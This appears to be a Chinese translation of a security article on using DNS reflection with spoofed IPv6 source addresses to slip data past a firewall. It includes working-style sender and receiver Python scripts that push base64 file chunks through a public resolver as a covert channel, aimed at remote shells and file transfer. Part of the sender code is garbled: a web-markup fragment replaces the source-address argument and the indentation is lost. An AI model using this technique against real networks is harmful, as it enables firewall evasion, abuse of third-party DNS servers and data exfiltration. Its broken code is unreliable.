利用DNS反射繞過防火牆進行通信


利用DNS反射繞過防火牆進行通信

域名系統(Domain Name System)幾乎和互聯網一樣古老。它的特殊結構也使它早就成為黑客的利用對象。在這篇短文中,我將詳細描述DNS反射的原理,為什麼黑客喜歡使用它,以及你為什麼要用它。

讓我們想象一個網絡場景,某道防火牆僅允許內網和Linux軟件安裝包存儲庫以及DNS服務器進行通信。這意味著從攻擊者的計算機發送的數據包到達不了受害者的服務器,反之亦然。為了突破防禦,我們需要“篡改”IP包的源地址,讓防火牆認為這個數據包是由白名單中的IP發出的。

為什麼黑客通常會使用DNS服務器進行反射(DDoS攻擊)?主要原因是DNS回覆流量遠遠大於對應的請求流量,這樣就可以放大黑客的DoS流量,增強攻擊的破壞力;而另一個原因則是DNS請求使用的是非面向連接的UDP協議。因此,現在有不少管理員都在防火牆上配置阻斷DNS流量。

利用DNS反射繞過防火牆進行通信

為什麼你也需要使用DNS反射?假設你想與上圖中的服務器通信,能相互交流(例如一個遠程shell)。有一個很容易而且很常見的方法就是創建自己的DNS服務器,然後通過虛假的DNS查詢進行通信。這的確是一個很好的方法,但我想向你展示一種無需設置任何額外的服務器而進行通信的方法,只需要利用IPv6即可,它的直連特性(不存在NAT)極大幫助了我們。

以下兩端Python示例代碼可把一個文件發送到另一個臺電腦中,且無需兩臺機器能夠互相通信。主要通過把文件拆分成60字節的數據塊(單個域名的最大長度域),再輔以DNS反射技術實現的。

請在完全屬於你的網絡環境中進行以下實驗,不要去攻擊任何DNS服務器。

Sender code:

#!/usr/bin/python3
from kamene.all import *
import base64,time,sys
dnsaddr = "2620:119:35::35" # OpenDNS as an example
send_delay = 0.8
def send_packet(ip,packet_data):
encoded_message = base64.b64encode(packet_data.encode('ascii'))+b'-'
encoded_message_size = len(encoded_message)
for i in range(0,encoded_message_size,60):
data = encoded_message[i:i+60]
DNSpacket = IPv6(dst=dnsaddr,class="lazy" data-original=ip)/UDP(sport=RandShort())/DNS(id=1337,rd=0,z=0,tc=1,qd=DNSQR(qname=data,qtype="A",qclass="IN"))
send(DNSpacket,verbose=0)
time.sleep(send_delay)
if len(sys.argv)<3:

print(f'{sys.argv[0]}receiver_ipv6_addr data_file')
sys.exit()
send_packet(sys.argv[1],open(sys.argv[2]).read())

Receiver code:

#!/usr/bin/python3
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from kamene.all import *
import base64,sys
def receive_packet(listen_iface):
data = bytearray()
while not b'-' in data :
DNSPacket = sniff(iface=listen_iface,filter="src port 53",count=1)
if(DNSPacket[0].haslayer(DNS))and(DNSPacket[0].getlayer(DNS).id==1337):
data += (DNSPacket[0].getlayer(DNS).qd.qname[:-1])
print(base64.b64decode(data[:-1]).decode('ascii'),end='')
if len(sys.argv)<2:
print(f'{sys.argv[0]}listen_interface')
sys.exit()
receive_packet(sys.argv[1])

引用

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

https://kamene.readthedocs.io/en/latest/introduction.html#about-scapy

本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場

來源:https://nosec.org/home/detail/2868.html

原文:https://pagedout.institute/download/PagedOut_001_beta1.pdf

白帽匯從事信息安全,專注於安全大數據、企業威脅情報。

公司產品:FOFA-網絡空間安全搜索引擎、FOEYE-網絡空間檢索系統、NOSEC-安全訊息平臺。

為您提供:網絡空間測繪、企業資產收集、企業威脅情報、應急響應服務。


分享到:


相關文章: